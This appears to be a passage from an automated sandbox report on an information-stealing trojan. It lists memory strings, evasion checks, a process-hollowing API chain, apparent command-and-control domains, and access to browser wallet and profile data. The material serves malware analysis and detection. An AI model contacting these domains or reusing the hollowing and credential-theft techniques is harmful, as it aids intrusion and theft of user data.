                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E910000_2_00E91000
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E94C8C0_2_00E94C8C
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EA6F3A0_2_00EA6F3A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E1368A3_3_00E1368A
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: String function: 00E95190 appears 46 times
                Source: random.exe.10.exeStatic PE information: invalid certificate
                Source: random.exe.10.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: random.exe.10.exeStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                Source: random.exe.10.exeStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                Source: C:\Users\user\Desktop\random.exe.10.exeCommand line argument: .0_2_00E9E280
                Source: C:\Users\user\Desktop\random.exe.10.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: random.exe.10.exe, 00000003.00000003.1532325137.000000000369A000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1556569395.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531882949.00000000036B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: random.exe.10.exeReversingLabs: Detection: 73%
                Source: C:\Users\user\Desktop\random.exe.10.exeFile read: C:\Users\user\Desktop\random.exe.10.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"
                Source: C:\Users\user\Desktop\random.exe.10.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\random.exe.10.exeProcess created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"
                Source: C:\Users\user\Desktop\random.exe.10.exeProcess created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"Jump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: random.exe.10.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: random.exe.10.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: random.exe.10.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: random.exe.10.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: random.exe.10.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: random.exe.10.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E9534A push ecx; ret 0_2_00E9535D
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A3F1 push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A3F1 push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0DCF9 push edi; ret 3_3_00E0DCFA
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0DCF9 push edi; ret 3_3_00E0DCFA
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0DCF9 push edi; ret 3_3_00E0DCFA
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E05FD8 push eax; iretd 3_3_00E05FD9
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E08DB0 push eax; iretd 3_3_00E08DB1
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E08DB0 push eax; iretd 3_3_00E08DB1
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0B5B9 pushad ; retf 3_3_00E0B631
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0B5B9 pushad ; retf 3_3_00E0B631
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A27F push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A27F push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0CB10 push ds; iretd 3_3_00E0CB19
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0CB10 push ds; iretd 3_3_00E0CB19
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0CB10 push ds; iretd 3_3_00E0CB19
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A3F1 push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A3F1 push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0DCF9 push edi; ret 3_3_00E0DCFA
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0DCF9 push edi; ret 3_3_00E0DCFA
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0DCF9 push edi; ret 3_3_00E0DCFA
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E05FD8 push eax; iretd 3_3_00E05FD9
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E08DB0 push eax; iretd 3_3_00E08DB1
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E08DB0 push eax; iretd 3_3_00E08DB1
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0B5B9 pushad ; retf 3_3_00E0B631
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0B5B9 pushad ; retf 3_3_00E0B631
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A27F push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0A27F push eax; ret 3_3_00E0A459
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0CB10 push ds; iretd 3_3_00E0CB19
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0CB10 push ds; iretd 3_3_00E0CB19
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 3_3_00E0CB10 push ds; iretd 3_3_00E0CB19
                Source: C:\Users\user\Desktop\random.exe.10.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\random.exe.10.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exe TID: 7932Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exe TID: 7952Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EA36A9 FindFirstFileExW,0_2_00EA36A9
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EA375A
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
                Source: random.exe.10.exe, 00000003.00000002.1738560783.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.0000000003734000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\random.exe.10.exeAPI call chain: ExitProcess graph end nodegraph_0-14489
                Source: C:\Users\user\Desktop\random.exe.10.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E95020
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EB519E mov edi, dword ptr fs:[00000030h]0_2_00EB519E
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E91614 mov edi, dword ptr fs:[00000030h]0_2_00E91614
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E9FE2C GetProcessHeap,0_2_00E9FE2C
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E95020
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E95014 SetUnhandledExceptionFilter,0_2_00E95014
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E9B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E9B4B9
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E94C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E94C64

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EB519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00EB519E
                Source: C:\Users\user\Desktop\random.exe.10.exeMemory written: C:\Users\user\Desktop\random.exe.10.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                Source: C:\Users\user\Desktop\random.exe.10.exeProcess created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"Jump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetLocaleInfoW,0_2_00EA30D1
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: EnumSystemLocalesW,0_2_00EA3086
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00EA3178
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetLocaleInfoW,0_2_00EA327E
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetLocaleInfoW,0_2_00E9F21C
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00EA2A13
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00EA2CFF
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: EnumSystemLocalesW,0_2_00EA2C64
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: GetLocaleInfoW,0_2_00EA2FB1
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: EnumSystemLocalesW,0_2_00EA2F52
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: EnumSystemLocalesW,0_2_00E9F717
                Source: C:\Users\user\Desktop\random.exe.10.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00E959A7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E959A7
                Source: C:\Users\user\Desktop\random.exe.10.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\random.exe.10.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: random.exe.10.exe PID: 7908, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
